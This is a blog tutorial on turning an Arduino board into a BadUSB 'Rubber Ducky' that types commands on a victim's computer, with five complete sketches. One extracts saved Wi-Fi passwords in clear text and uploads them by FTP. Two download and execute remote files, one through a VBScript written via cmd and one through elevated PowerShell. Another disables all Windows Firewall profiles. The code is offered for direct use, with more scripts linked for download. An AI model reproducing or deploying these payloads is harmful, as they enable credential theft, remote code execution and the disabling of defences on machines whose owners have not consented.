Create a BadUSB Rubber Ducky using Arduino
August 21st, 2019 by cedcraftscodes
Rubber Ducky is the most popular tool to inject keystrokes on a victim’s computer at lightning speed. Masked as a regular USB device, Rubber Ducky acts like a keyboard (Human Interface Device) and automates key presses. It executes command upon plugging in the USB device. It is very effective because, a computer trust human, a human use keyboard to communicate, therefore, computer trusts keyboards.
With lightning-fast typing, we can do various things like, download a backdoor payload generated by Metasploit, disable firewalls, extract saved passwords and more.
Today we will learn how to create a Rubber Ducky using Arduino.
Video Demonstration
Requirements
SS Micro ATmega32U4 Arduino Compatible
Arduino IDE
Let’s start with the basics.
Paste the script provided below in your Arduino IDE. Select the proper port where your Arduino is connected. In this tutorial, I am using an Arduino Leonardo type of board so I selected Arduino Leonardo in Boards.
Script #1: Opening a notepad
Description: Opens up a notepad and print “You have been pawned”
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 | #include <Keyboard.h> void setup() { Keyboard.begin(); delay(1000); Keyboard.press(KEY_LEFT_GUI); Keyboard.press('r'); delay(10); Keyboard.releaseAll(); delay(200); Keyboard.print("notepad"); Keyboard.press(KEY_RETURN); delay(10); Keyboard.releaseAll(); delay(500); Keyboard.print("You have been pawned!"); delay(5000); Keyboard.press(KEY_LEFT_CTRL); Keyboard.press('a'); delay(10); Keyboard.releaseAll(); Keyboard.press(KEY_DELETE); delay(10); Keyboard.releaseAll(); Keyboard.press(KEY_LEFT_ALT); Keyboard.press(KEY_F4); delay(10); Keyboard.releaseAll(); Keyboard.end(); } void loop() {} |
Script 2#: Extract Wifi Password and upload it in FTP
Description: Open up a Powershell and extract Wifi Passwords. After extracting the wifi password, save it to a file and FTP it to FTP Server.
Additional Step: Change your FTP credentials. Modify “localhost”, “user” and “user123”.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 | #include <Keyboard.h> void setup() { Keyboard.begin(); delay(1000); Keyboard.press(KEY_LEFT_GUI); Keyboard.press(114); Keyboard.releaseAll(); delay(300); Keyboard.print("powershell Start-Process powershell -Verb runAs"); typeKey(KEY_RETURN); delay(1000); Keyboard.press(KEY_LEFT_ALT); Keyboard.press(121); Keyboard.releaseAll(); delay(2000); Keyboard.print("(netsh wlan show profiles) | Select-String \"\\:(.+)$\" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=\"$name\" key=clear)} | Select-String \"Key Content\\W+\\:(.+)$\" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >> log.txt"); typeKey(KEY_RETURN); delay(1500); Keyboard.print("ftp"); typeKey(KEY_RETURN); delay(100); Keyboard.print("open localhost"); typeKey(KEY_RETURN); delay(100); Keyboard.print("user"); typeKey(KEY_RETURN); delay(100); Keyboard.print("user123"); typeKey(KEY_RETURN); delay(100); Keyboard.print("put log.txt"); typeKey(KEY_RETURN); delay(2000); Keyboard.print("disconnect"); typeKey(KEY_RETURN); delay(100); Keyboard.print("quit"); typeKey(KEY_RETURN); delay(100); Keyboard.print("exit"); typeKey(KEY_RETURN); Keyboard.end(); } void typeKey(int key){ Keyboard.press(key); delay(50); Keyboard.release(key); } void loop() {} |
Script #3: Download and execute a file.
Description: It downloads a file using cmd commands.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 | #include <Keyboard.h> void setup() { Keyboard.begin(); delay(1000); Keyboard.press(KEY_LEFT_CTRL); Keyboard.press(KEY_ESC); Keyboard.releaseAll(); delay(300); Keyboard.print("cmd"); delay(300); typeKey(KEY_RETURN); delay(300); randomSeed(analogRead(0)); long randNumber = random(10, 500); delay(10); Keyboard.print("copy con download_"+ String(randNumber) +".vbs"); typeKey(KEY_RETURN); Keyboard.print("Set args = WScript.Arguments:a = split(args(0), \"/\")(UBound(split(args(0),\"/\")))"); typeKey(KEY_RETURN); Keyboard.print("Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\"):objXMLHTTP.open \"GET\", args(0), false:objXMLHTTP.send()"); typeKey(KEY_RETURN); Keyboard.print("If objXMLHTTP.Status = 200 Then"); typeKey(KEY_RETURN); Keyboard.print("Set objADOStream = CreateObject(\"ADODB.Stream\"):objADOStream.Open"); typeKey(KEY_RETURN); Keyboard.print("objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0"); typeKey(KEY_RETURN); Keyboard.print("Set objFSO = Createobject(\"Scripting.FileSystemObject\"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a"); typeKey(KEY_RETURN); Keyboard.print("objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing"); typeKey(KEY_RETURN); Keyboard.print("End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing"); typeKey(KEY_RETURN); Keyboard.press(KEY_LEFT_CTRL); Keyboard.press(122); Keyboard.releaseAll(); typeKey(KEY_RETURN); Keyboard.print("cscript download_"+ String(randNumber) +".vbs http://hddfhm.com/images/baby-clipart-duck-1.png"); typeKey(KEY_RETURN); Keyboard.print("baby-clipart-duck-1.png"); typeKey(KEY_RETURN); Keyboard.print("exit"); typeKey(KEY_RETURN); Keyboard.end(); } void typeKey(int key){ Keyboard.press(key); delay(50); Keyboard.release(key); } void loop() {} |
Script #4: Download a file and execute it using Powershell
Description: Open up a Powershell with elevation, downloads file and execute it.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 | #include <Keyboard.h> void setup() { String url = "https://www.munchkin.com/media/catalog/product/3/1/31001_white_hot_safety_bath_ducky.jpg"; String file = "31001_white_hot_safety_bath_ducky.jpg"; Keyboard.begin(); delay(1000); Keyboard.press(KEY_LEFT_GUI); Keyboard.press(114); Keyboard.releaseAll(); delay(200); Keyboard.print("powershell Start-Process powershell -Verb runAs"); typeKey(KEY_RETURN); delay(1000); Keyboard.press(KEY_LEFT_ALT); Keyboard.press(121); Keyboard.releaseAll(); delay(200); Keyboard.print("[Net.ServicePointManager]::SecurityProtocol = \"tls12, tls11, tls\"; $down = New-Object System.Net.WebClient; $url = '" + url +"'; $file = '" + file +"'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($PSScriptRoot + $file); exit;"); typeKey(KEY_RETURN); Keyboard.end(); } void typeKey(int key){ Keyboard.press(key); delay(50); Keyboard.release(key); } void loop() {} |
Script #5: Disable Windows Firewall using Powershell
Description: Opens up a Powershell and disable the firewall.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 | #include <Keyboard.h> void setup() { Keyboard.begin(); delay(1000); Keyboard.press(KEY_LEFT_GUI); Keyboard.press(114); Keyboard.releaseAll(); delay(200); Keyboard.print("powershell Start-Process powershell -Verb runAs"); typeKey(KEY_RETURN); delay(1000); Keyboard.press(KEY_LEFT_ALT); Keyboard.press(121); Keyboard.releaseAll(); delay(200); Keyboard.print("Write-Host \"Disabling Firewall...\""); typeKey(KEY_RETURN); delay(200); Keyboard.print("Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"); typeKey(KEY_RETURN); delay(500); // Keyboard.print("netsh advfirewall set allprofiles state off"); // typeKey(KEY_RETURN); // delay(500); Keyboard.print("exit"); typeKey(KEY_RETURN); delay(30); Keyboard.end(); } void typeKey(int key){ Keyboard.press(key); delay(50); Keyboard.release(key); } void loop() {} |
If you want to acquire the other script shown in the video demonstration, you can download it here.
Rubber Ducky Scripts (8075 downloads)Related Posts
Publishing Java SpringBoot Library in JitPack
Deploy React Application in Netlify
MFRC522 RFID Read and Write Data in Specific RFID Block
Social Media Phishing with Captive Portal using NodeMcu
Scan WordPress site Vulnerabilities using WPScan
Comments
2 Comments
Leave a Reply
Recent Posts
cedcraftscodes
February 23, 2020 at 10:51 amGreat!
duke
May 28, 2020 at 6:12 pmhello.
How to access other scripts